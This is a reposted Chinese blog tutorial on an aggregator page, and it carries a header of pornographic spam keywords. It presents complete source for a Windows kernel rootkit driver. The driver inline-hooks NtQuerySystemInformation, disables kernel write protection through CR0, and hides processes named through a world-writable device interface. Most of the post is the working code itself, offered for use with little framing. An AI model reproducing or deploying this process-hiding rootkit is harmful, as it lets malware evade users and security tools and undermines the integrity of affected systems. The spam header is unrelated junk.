日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當(dāng)前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

内核层 inlinehook 隐藏进程

發(fā)布時間:2024/4/11 编程问答 31 豆豆
生活随笔 收集整理的這篇文章主要介紹了 内核层 inlinehook 隐藏进程 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

?上次是SSDT??HOOK 方式 隱藏 進(jìn)程 ,如鏈接:http://blog.csdn.net/hjxyshell/article/details/16993119

這次是InlineHook 方式隱藏進(jìn)程,這里inline hook的原理就不做詳細(xì)介紹了,網(wǎng)上相關(guān)資源較多,擼主主要參考看雪的某大牛的“詳談內(nèi)核三步走Inline Hook實現(xiàn)”(http://bbs.pediy.com/showthread.php?t=98493

中間有一些關(guān)于進(jìn)程的枚舉的處理,上次寫了個簡單的代碼:http://blog.csdn.net/hjxyshell/article/details/17312119


代碼如下:


?

[cpp]?view plaincopy
  • #include?<ntddk.h>??
  • #include?<Wdmsec.h>????
  • #include?<Wdm.h>????
  • ??
  • //定義控制碼????
  • #define?MY_DVC_IN_CODE?\??
  • ????????(ULONG)CTL_CODE(FILE_DEVICE_UNKNOWN,\??
  • ????????????????0xa02,\??
  • ????????????????METHOD_BUFFERED,\??
  • ????????????????FILE_READ_DATA|FILE_WRITE_DATA)??
  • ??
  • //隱藏進(jìn)程鏈表相關(guān)變量??
  • //存放要隱藏進(jìn)程的名字鏈表????
  • typedef?struct?_ProcNameLink????
  • {????
  • ????UNICODE_STRING?ProcName;????
  • ????struct?_ProcNameLink?*pNext;????
  • }ProcNameLink,*pProcNameLink;??
  • ??
  • pProcNameLink?pProcNameHeader;??//鏈表頭部????
  • pProcNameLink?pProcNameTail;???//鏈表尾部???
  • //字節(jié)型數(shù)據(jù)??unsigned?char??
  • typedef?unsigned?char?BYTE;??
  • ULONG??CR0VALUE;???????????????????????//設(shè)置cr0的讀寫標(biāo)識??
  • BYTE??OriginalBytes[5]={0};?????????????//保存原始函數(shù)前五個字節(jié)?????????????
  • BYTE?JmpAddress[5]={0xE9,0,0,0,0};???????//跳轉(zhuǎn)到HOOK函數(shù)的地址??
  • ??
  • //進(jìn)程線程?信息??結(jié)構(gòu)體??
  • struct?_SYSTEM_THREADS????
  • {????
  • ????????LARGE_INTEGER???????????KernelTime;????
  • ????????LARGE_INTEGER???????????UserTime;????
  • ????????LARGE_INTEGER???????????CreateTime;????
  • ????????ULONG???????????????????????????WaitTime;????
  • ????????PVOID???????????????????????????StartAddress;????
  • ????????CLIENT_ID???????????????????????ClientIs;????
  • ????????KPRIORITY???????????????????????Priority;????
  • ????????KPRIORITY???????????????????????BasePriority;????
  • ????????ULONG???????????????????????????ContextSwitchCount;????
  • ????????ULONG???????????????????????????ThreadState;????
  • ????????KWAIT_REASON????????????WaitReason;????
  • };????
  • //進(jìn)程信息結(jié)構(gòu)體????
  • struct?_SYSTEM_PROCESSES????
  • {????
  • ????????ULONG???????????????????????????NextEntryDelta;????
  • ????????ULONG???????????????????????????ThreadCount;????
  • ????????ULONG???????????????????????????Reserved[6];????
  • ????????LARGE_INTEGER???????????????????CreateTime;????
  • ????????LARGE_INTEGER???????????????????UserTime;????
  • ????????LARGE_INTEGER???????????????????KernelTime;????
  • ????????UNICODE_STRING??????????????????ProcessName;????
  • ????????KPRIORITY???????????????????????BasePriority;????
  • ????????ULONG???????????????????????????ProcessId;????
  • ????????ULONG???????????????????????????InheritedFromProcessId;????
  • ????????ULONG???????????????????????????HandleCount;????
  • ????????ULONG???????????????????????????Reserved2[2];????
  • ????????VM_COUNTERS?????????????????????VmCounters;????
  • ????????IO_COUNTERS?????????????????????IoCounters;?//windows?2000?only????
  • ????????struct?_SYSTEM_THREADS??????????Threads[1];????
  • };????
  • ??
  • //原函數(shù),獲取進(jìn)程(系統(tǒng))相關(guān)信息??
  • NTSYSAPI????
  • NTSTATUS????
  • NTAPI?NtQuerySystemInformation(????
  • ????????????????????????IN?ULONG?SystemInformationClass,????
  • ????????????????????????OUT?PVOID?SystemInformation,????
  • ????????????????????????IN?ULONG?SystemInformationLength,????
  • ????????????????????????OUT?PULONG?ReturnLength????
  • ????????????????????????????);??
  • NTSTATUS??
  • MyNtQuerySystemInformation(??
  • ????????????????????????IN?ULONG?SystemInformationClass,??
  • ????????????????????????OUT?PVOID?SystemInformation,??
  • ????????????????????????IN?ULONG?SystemInformationLength,??
  • ????????????????????????OUT?PULONG?ReturnLength??
  • ????????????????????????????);??
  • ??
  • //改變函數(shù)前五個字節(jié),使其跳到MyNtQuerySystemInformation函數(shù)中?????????????????????????????
  • void?HookNtQuerySystemInformation(??
  • ????????????????????//??IN?ULONG?SystemInformationClass,??
  • ????????????????????//??OUT?PVOID?SystemInfotmation,??
  • ????????????????????//??IN?ULONOG?SystemInformatonLength,??
  • ????????????????????//??OUT?PULONG?ReturnLength??
  • ????????????????????????????????)??
  • {??
  • ????//賦值前面的數(shù)組??
  • ????KIRQL?Irql;??
  • ????DbgPrint("[NtQuerySystemInformation]:?0x%x",NtQuerySystemInformation);??
  • ????//保存原函數(shù)前5個字節(jié)??
  • ????RtlCopyMemory(OriginalBytes,(BYTE*)NtQuerySystemInformation,5);??
  • ????//保存新函數(shù)5個字節(jié)自后的偏移??
  • ????*(ULONG*)(JmpAddress?+?1)?=?(ULONG)MyNtQuerySystemInformation?-?((ULONG)NtQuerySystemInformation+5);??
  • ????//開始inline?hook??即將跳轉(zhuǎn)到新函數(shù)指令拷貝到原函數(shù)前5個字節(jié)??
  • ????//關(guān)閉內(nèi)存寫保護(hù)??
  • ????__asm??
  • ????{??
  • ????//這里只用到eax,保存eax即可??
  • ????push?eax??
  • ????mov?eax,cr0??
  • ????mov?CR0VALUE,eax??
  • ????and?eax,0fffeffffh??
  • ????mov?cr0,eax??
  • ????pop?eax??
  • ????}??
  • ????//提升IRQL中斷級(防止寫的過程中出新中斷,導(dǎo)致出錯)??
  • ????Irql?=?KeRaiseIrqlToDpcLevel();??
  • ????//開始寫函數(shù)的前5個字節(jié)(jmp?指令)??
  • ????RtlCopyMemory((BYTE*)NtQuerySystemInformation,JmpAddress,5);??
  • ????//恢復(fù)Irql??
  • ????KeLowerIrql(Irql);??
  • ????//開啟內(nèi)存寫保護(hù)??
  • ????__asm??
  • ????{??
  • ????push?eax??
  • ????mov?eax,CR0VALUE??
  • ????mov?cr0,eax??
  • ????pop?eax??
  • ????}??
  • ??????
  • }??
  • //取消inline?hook??
  • void?UnHookNtQuerySystemInformation(??
  • ????????????????????//??IN?ULONG?SystemInformationClass,??
  • ????????????????????//??OUT?PVOID?SystemInfotmation,??
  • ????????????????????//??IN?ULONOG?SystemInformatonLength,??
  • ????????????????????//??OUT?PULONG?ReturnLength??
  • ????????????????????????????????)??
  • {??
  • ????//把保存的五個字節(jié)寫回原函數(shù)??
  • ????KIRQL?Irql;??
  • ????//關(guān)閉寫保護(hù)??
  • ????__asm??
  • ????{??
  • ????????push?eax??
  • ????????mov?eax,cr0??
  • ????????mov?CR0VALUE,eax??
  • ????????and?eax,0fffeffffh??
  • ????????mov?cr0,eax??
  • ????????pop?eax??
  • ????}??
  • ????//提升IRQL?到?Dpc??
  • ????Irql?=?KeRaiseIrqlToDpcLevel();??
  • ????RtlCopyMemory((BYTE*)NtQuerySystemInformation,OriginalBytes,5);??
  • ????KeLowerIrql(Irql);??
  • ????//開啟內(nèi)存寫保護(hù)??
  • ????__asm??
  • ????{??
  • ????push?eax??
  • ????mov?eax,CR0VALUE??
  • ????mov?cr0,eax??
  • ????pop?eax??
  • ????}??
  • }??
  • //原函數(shù)??
  • _declspec?(naked)?NTSTATUS?OriginalNtQuerySystemInformation(??
  • ????????????????????????????????????????IN?ULONG?SystemInformationClass,??
  • ????????????????????????????????????????OUT?PVOID?SystemInfotmation,??
  • ????????????????????????????????????????IN?ULONG?SystemInformatonLength,??
  • ????????????????????????????????????????OUT?PULONG?ReturnLength??
  • ????????????????????????????????????????????????????????????)??
  • {??
  • ????__asm{??
  • ????????//這里的eax不是隨便使用個寄存器就行的,因為??
  • ????????//隨便使用個寄存器很可能會破壞原來的值??
  • ????????//因為eax的值在接下來會直接被覆蓋(原來的值是什么不重要了),所以這里可以使用??
  • ????????push?210h??
  • ????????mov?eax,NtQuerySystemInformation??
  • ????????add?eax,5??
  • ????????jmp?eax??
  • ????????}?????????
  • }??
  • ??
  • //MyNtQuerySystemInformation函數(shù),再此處?進(jìn)行進(jìn)程隱藏處理??
  • NTSTATUS??
  • MyNtQuerySystemInformation(??
  • ????????????????????????IN?ULONG?SystemInformationClass,??
  • ????????????????????????OUT?PVOID?SystemInformation,??
  • ????????????????????????IN?ULONG?SystemInformationLength,??
  • ????????????????????????OUT?PULONG?ReturnLength??
  • ????????????????????????????)??
  • {??
  • ????????NTSTATUS?ntStatus;??
  • ????????pProcNameLink?pTempLink;??//進(jìn)程查詢時使用??
  • ????????//DbgPrint("it's?here!!!\n");??
  • ????????//查詢系統(tǒng)信息??
  • ????????ntStatus?=?OriginalNtQuerySystemInformation(??
  • ????????????????????????????????????????????SystemInformationClass,??
  • ????????????????????????????????????????????SystemInformation,??
  • ????????????????????????????????????????????SystemInformationLength,??
  • ????????????????????????????????????????????ReturnLength??
  • ????????????????????????????????????????????????????);??
  • ????????if(NT_SUCCESS(ntStatus))??
  • ????????{??
  • ????????????if(SystemInformationClass?==?5)??
  • ????????????{??
  • ????????????????//獲取進(jìn)程信息結(jié)構(gòu)??
  • ????????????????for((pTempLink?=?pProcNameHeader->pNext)&&(pTempLink?!=?NULL);pTempLink?!=NULL;)??
  • ????????????????{??
  • ????????????????????//每次查看時?,都從進(jìn)程的列表開始查看??
  • ????????????????????struct?_SYSTEM_PROCESSES?*curr?=?(struct?_SYSTEM_PROCESSES?*)SystemInformation;??
  • ????????????????????struct?_SYSTEM_PROCESSES?*prev?=?NULL;??
  • ????????????????????while(curr)??
  • ????????????????????{??
  • ????????????????????????if(curr->ProcessName.Buffer?!=?NULL)??
  • ????????????????????????{??
  • ????????????????????????????if(0?==?memcmp(curr->ProcessName.Buffer,pTempLink->ProcName.Buffer,16))?//判斷是否為要隱藏的進(jìn)程??
  • ????????????????????????????{??
  • ????????????????????????????????//判斷眼隱藏的進(jìn)程在鏈表的那個位置??
  • ????????????????????????????????if(prev)?//中間或最后??
  • ????????????????????????????????{??
  • ????????????????????????????????????if(curr->NextEntryDelta)????
  • ????????????????????????????????????????prev->NextEntryDelta?+=?curr->NextEntryDelta;????
  • ????????????????????????????????????else????//?在最后????
  • ????????????????????????????????????????prev->NextEntryDelta?=?0;????
  • ????????????????????????????????}??
  • ????????????????????????????????else????
  • ????????????????????????????????{????
  • ????????????????????????????????????if(curr->NextEntryDelta)????
  • ????????????????????????????????????{????
  • ????????????????????????????????????????//?要隱藏的進(jìn)程在第一個????
  • ????????????????????????????????????????(char?*)SystemInformation?+=?curr->NextEntryDelta;????
  • ????????????????????????????????????}????
  • ????????????????????????????????????else?//?只有當(dāng)前一個進(jìn)程????
  • ????????????????????????????????????????SystemInformation?=?NULL;????
  • ????????????????????????????????}????
  • ????????????????????????????}??
  • ????????????????????????}??
  • ????????????????????????prev?=?curr;????
  • ????????????????????????if(curr->NextEntryDelta)?????
  • ????????????????????????????(char?*)curr?+=?curr->NextEntryDelta;????
  • ????????????????????????else?????
  • ????????????????????????????curr?=?NULL;??????????????????????
  • ????????????????????}??
  • ?????????????????pTempLink?=?pTempLink->pNext;??
  • ????????????????}?????
  • ????????????}??
  • ????????}?????????????????????????????????
  • ????return?ntStatus;??
  • ????//return?1;??
  • }??
  • //向鏈表匯總加入新的要隱藏的進(jìn)程????
  • VOID?AddProcToLink(PUNICODE_STRING?ProcName)????
  • {????
  • ????//先判斷該進(jìn)程是否已存在,已存在則不添加(不判斷也不影響結(jié)果)????
  • ????pProcNameLink?pNewLink?=?(pProcNameLink)ExAllocatePool(NonPagedPool,?sizeof(ProcNameLink));??//新增節(jié)點????
  • ????(pNewLink->ProcName).Length?=?0;????
  • ????(pNewLink->ProcName).MaximumLength?=?256;????
  • ????(pNewLink->ProcName).Buffer?=?(PWCHAR)ExAllocatePool(NonPagedPool,?256);??//新增節(jié)點????
  • ????????
  • ????RtlCopyUnicodeString(&(pNewLink->ProcName),ProcName);??//復(fù)制????
  • ????pNewLink->pNext?=?NULL;????
  • ????pProcNameTail->pNext?=?pNewLink;????
  • ????pProcNameTail?=?pNewLink;????//鏈表末尾????
  • }????
  • //移除某個進(jìn)程????
  • VOID?RmProcFromLink(PUNICODE_STRING?pProcName)????
  • {????
  • ????pProcNameLink?pNewLink?=?pProcNameHeader;????
  • ????if(pProcNameHeader->pNext?==?NULL)????
  • ????????return;????
  • ????for(?pNewLink;pNewLink->pNext?!=?NULL;)????
  • ????{????
  • ????????//找到,則從鏈表中刪除????
  • ????????if(RtlCompareUnicodeString(&(pNewLink->pNext->ProcName),pProcName,TRUE)==0)????
  • ????????{????
  • ????????????pNewLink->pNext?=?pNewLink->pNext->pNext;????
  • ????????????if(pNewLink->pNext?==?NULL)??//鏈表結(jié)尾,為指針標(biāo)識賦值????
  • ????????????????pProcNameTail?=?pNewLink;????
  • ????????????break;????
  • ????????}????
  • ????????pNewLink?=?pNewLink->pNext;??//沒有寫在for里面是為了方便調(diào)試時下斷點????
  • ????}????
  • ????
  • }????
  • //卸載驅(qū)動??
  • VOID?OnUnload(IN?PDRIVER_OBJECT?driver)????
  • {????
  • ????UNICODE_STRING?symblink_name;??//c語言定義變量放在前面????
  • ????DbgPrint("ROOTKIT:?OnUnload?called\n");????
  • ???//?unhook?ZwQuerySystemInformation????
  • ????UnHookNtQuerySystemInformation();??
  • ??????
  • ????if(IoIsWdmVersionAvailable(1,0x10))????
  • ????{????
  • ????????//支持通用版本本,則創(chuàng)建全局符號鏈接\DosDevices\Global????
  • ????????RtlInitUnicodeString(&symblink_name,L"\\DosDevices\\Global\\testSL");???????????
  • ????}????
  • ????else????
  • ????{????
  • ????????//不支持,用\DosDevices????
  • ????????RtlInitUnicodeString(&symblink_name,L"\\DosDevices\\testSL");????
  • ????}????
  • ????IoDeleteSymbolicLink(&symblink_name?);????
  • ????IoDeleteDevice(driver->DeviceObject);????
  • ????DbgPrint("our?driver?is?unloading?...?\r\n");????
  • }????
  • //分發(fā)函數(shù)??
  • NTSTATUS?MyDispatchFunction(PDEVICE_OBJECT?device,?PIRP?irp)????
  • {????
  • ????CHAR?inBuffer[256];????
  • ????short?flag?=?1;??//增加鏈表????
  • ????ANSI_STRING?ansiBuffer;????
  • ????UNICODE_STRING?unicodeBuffer;????
  • ????int?i;????
  • ????//獲得當(dāng)前IRP調(diào)用的棧空間????
  • ????PIO_STACK_LOCATION?irpsp?=?IoGetCurrentIrpStackLocation(irp);????
  • ????NTSTATUS?status?=?STATUS_INVALID_PARAMETER;????
  • ????memset(inBuffer,0,256);????
  • ????//處理各種請求????
  • ????switch(irpsp->MajorFunction)????
  • ????{????
  • ????????case?IRP_MJ_CREATE:????
  • ????????{????
  • ????????????//簡單返回一個IRP成功三部曲????
  • ????????????irp->IoStatus.Information?=?0;????
  • ????????????irp->IoStatus.Status?=?STATUS_SUCCESS;????
  • ????????????IoCompleteRequest(irp,IO_NO_INCREMENT);????
  • ????????????//應(yīng)用層,打開設(shè)備后?打印此字符串,僅為測試????
  • ????????????DbgPrint("congratulations?gay,open?device");????
  • ????????????status?=?irp->IoStatus.Status;????
  • ????????????break;????
  • ????????}????
  • ????????case?IRP_MJ_CLOSE:????
  • ????????{????
  • ????????????irp->IoStatus.Information?=?0;????
  • ????????????irp->IoStatus.Status?=?STATUS_SUCCESS;????
  • ????????????IoCompleteRequest(irp,IO_NO_INCREMENT);????
  • ????????????//應(yīng)用層,打開設(shè)備后?打印此字符串,僅為測試????
  • ????????????DbgPrint("congratulations?gay,close?device");????
  • ????????????status?=?irp->IoStatus.Status;????
  • ????????????break;????
  • ????????}????
  • ????????case?IRP_MJ_DEVICE_CONTROL:????
  • ????????{????
  • ????????????//得到功能號????
  • ????????????ULONG?code?=?irpsp->Parameters.DeviceIoControl.IoControlCode;????
  • ????????????//得到輸入/輸出緩沖區(qū)的長度????
  • ????????????ULONG?in_len?=?irpsp->Parameters.DeviceIoControl.InputBufferLength;????
  • ????????????ULONG?out_len?=?irpsp->Parameters.DeviceIoControl.OutputBufferLength;????
  • ????????????//輸入、輸出的緩沖區(qū)是公用的內(nèi)存空間的????
  • ????????????PCHAR?buffer?=?(PCHAR)irp->AssociatedIrp.SystemBuffer;????
  • ????????????//memcpy(inBuffer,buffer,in_len);????
  • ????????????//將短字符轉(zhuǎn)化為寬字符????
  • ????????????if(buffer[0]?==?'-')????
  • ????????????????flag?=?0;????
  • ????????????ansiBuffer.Buffer?=?buffer+1;????
  • ????????????ansiBuffer.Length?=?ansiBuffer.MaximumLength?=?(USHORT)(in_len?-1);????
  • ????????????RtlAnsiStringToUnicodeString(&unicodeBuffer,?&ansiBuffer,TRUE);????
  • ????????????if(flag)????
  • ????????????????AddProcToLink(&unicodeBuffer);???//將要隱藏的進(jìn)程加入到鏈表中????
  • ????????????else????
  • ????????????????RmProcFromLink(&unicodeBuffer);????
  • ????????????DbgPrint("%ansiBuffer?=?%Z\n",&ansiBuffer);????//注意是%Z????
  • ????????????DbgPrint("unicodeBuffer?=?%wZ\n",&unicodeBuffer);????
  • ????????????if(code?==?MY_DVC_IN_CODE)????
  • ????????????{????
  • ????????????????DbgPrint("in_buffer_len?=?%d",in_len);????
  • ????????????????DbgPrint("%s",buffer);????
  • ????????????????//因為不返回信息,直接返回成功即可????
  • ????????????????//沒有用到輸出緩沖區(qū)????
  • ????????????????irp->IoStatus.Information?=?0;????
  • ????????????????irp->IoStatus.Status?=?STATUS_SUCCESS;????
  • ????????????}????
  • ????????????else????
  • ????????????{????
  • ????????????????//控制碼錯誤,則不接受請求,直接返回錯誤????
  • ????????????????//注意返回錯誤和返回成功的區(qū)別????
  • ????????????????irp->IoStatus.Information?=?0;????
  • ????????????????irp->IoStatus.Status?=?STATUS_INVALID_PARAMETER;????
  • ????????????}????
  • ????????????IoCompleteRequest(irp,IO_NO_INCREMENT);????
  • ????????????status?=?irp->IoStatus.Status;????
  • ????????????break;????
  • ????????}????
  • ????????case?IRP_MJ_READ:????
  • ????????{????
  • ????????????break;????
  • ????????}????
  • ????????default:????
  • ????????{????
  • ????????????DbgPrint("unknow?request!!!");????
  • ????????????break;????
  • ????????}????
  • ????}????
  • ???????
  • ????return?status;????
  • }????
  • //驅(qū)動入口函數(shù)??
  • NTSTATUS?DriverEntry(IN?PDRIVER_OBJECT?driver,?????
  • ?????????????????????IN?PUNICODE_STRING?reg_path)???
  • {??
  • ????ULONG?i;????
  • ????NTSTATUS?status;????
  • ????PDEVICE_OBJECT?device;????
  • ????//設(shè)備名????
  • ????UNICODE_STRING?device_name?=?RTL_CONSTANT_STRING(L"\\Device\\test");????
  • ????//符號連接名????
  • ????UNICODE_STRING?symblink_name;????
  • ????//隨手寫一個GUID????
  • ????static?const?GUID?MYGUID_CLASS_MYCDO?=?????
  • ????{?0x63542127,?0xfbbb,?0x49c8,?{?0x8b,?0xf4,?0x8b,?0x7c,?0xb5,?0xef,?0xd3,?0x9e?}?};????
  • //static?const?GUID?DECLSPEC_SELECTANY?MYGUID_CLASS_MYCDO?=?????
  • //{?0x8524767,?0x32fe,?0x4d86,?{?0x9f,?0x48,?0xa0,?0x26,?0x94,?0xec,?0x71,?0x42?}?};????
  • ???????
  • ????//全用戶可讀權(quán)限、寫權(quán)限????
  • ????UNICODE_STRING?sdd1=RTL_CONSTANT_STRING(L"D:P(A;;GA;;;WD)");????
  • ????//初始化第一個結(jié)構(gòu)體????
  • ????pProcNameHeader?=(pProcNameLink)ExAllocatePool(NonPagedPool,?sizeof(ProcNameLink));????
  • ????pProcNameHeader->pNext?=?NULL;????
  • ????pProcNameTail?=?pProcNameHeader;????
  • ????//RtlInitUnicodeString(&(pProcNameHeader->ProcName),L"");????
  • ????//_asm?int?3????
  • ????//生成設(shè)備????
  • ????status?=?IoCreateDeviceSecure(????
  • ????????????????????????????driver,????
  • ????????????????????????????0,????
  • ????????????????????????????&device_name,????
  • ????????????????????????????FILE_DEVICE_UNKNOWN,????
  • ????????????????????????????FILE_DEVICE_SECURE_OPEN,????
  • ????????????????????????????FALSE,????
  • ????????????????????????????&sdd1,????
  • ????????????????????????????(LPCGUID)&MYGUID_CLASS_MYCDO,????
  • ????????????????????????????&device????
  • ????????????????????????????);????
  • ????if(!NT_SUCCESS(status))????
  • ????{????
  • ????????DbgPrint("IoCreateDeviceSecure?failed?");????
  • ????????return?status;????
  • ????}????
  • ????DbgPrint("good?job1");????
  • ????//創(chuàng)建符號鏈接????
  • ????if(IoIsWdmVersionAvailable(1,0x10))????
  • ????{????
  • ????????//支持通用版本本,則創(chuàng)建全局符號鏈接\DosDevices\Global????
  • ????????RtlInitUnicodeString(&symblink_name,L"\\DosDevices\\Global\\testSL");???????????
  • ????}????
  • ????else????
  • ????{????
  • ????????//不支持,用\DosDevices????
  • ????????RtlInitUnicodeString(&symblink_name,L"\\DosDevices\\testSL");????
  • ????}????
  • ????status?=?IoCreateSymbolicLink(&symblink_name,&device_name);????
  • ????if(!NT_SUCCESS(status))????
  • ????{????
  • ????????DbgPrint("IoCreateSymbolicLink?failed");????
  • ????????return?status;????
  • ????}????
  • ????DbgPrint("good?job2");????
  • ????//初始化驅(qū)動處理????
  • ????for(i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i++)????
  • ????{????
  • ????????driver->MajorFunction[i]?=?MyDispatchFunction;????
  • ????}????
  • ???//?save?old?system?call?locations????
  • ???//OldZwQuerySystemInformation?=(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));????
  • ?????//?Register?a?dispatch?function?for?Unload????
  • ????driver->DriverUnload??=?OnUnload;?????
  • ????????
  • ?????//?inline?hook?????
  • ????HookNtQuerySystemInformation();??
  • ??????????????????????????????????
  • ???return?STATUS_SUCCESS;??????????????
  • ???????????????????????
  • }??
    • 說明:

    ? ? _declspec (naked) NTSTATUS OriginalNtQuerySystemInformation??函數(shù)中的寄存器不是隨便使用的,正如代碼中注釋所述一樣,這里使用eax,因為eax的值會被直接覆蓋,對后續(xù)程序并無影響

    如圖:

    ?

    驅(qū)動安裝運行后,在查看函數(shù)NtQuerySystemInformation,已經(jīng)被我們掌控


    總結(jié)

    以上是生活随笔為你收集整理的内核层 inlinehook 隐藏进程的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。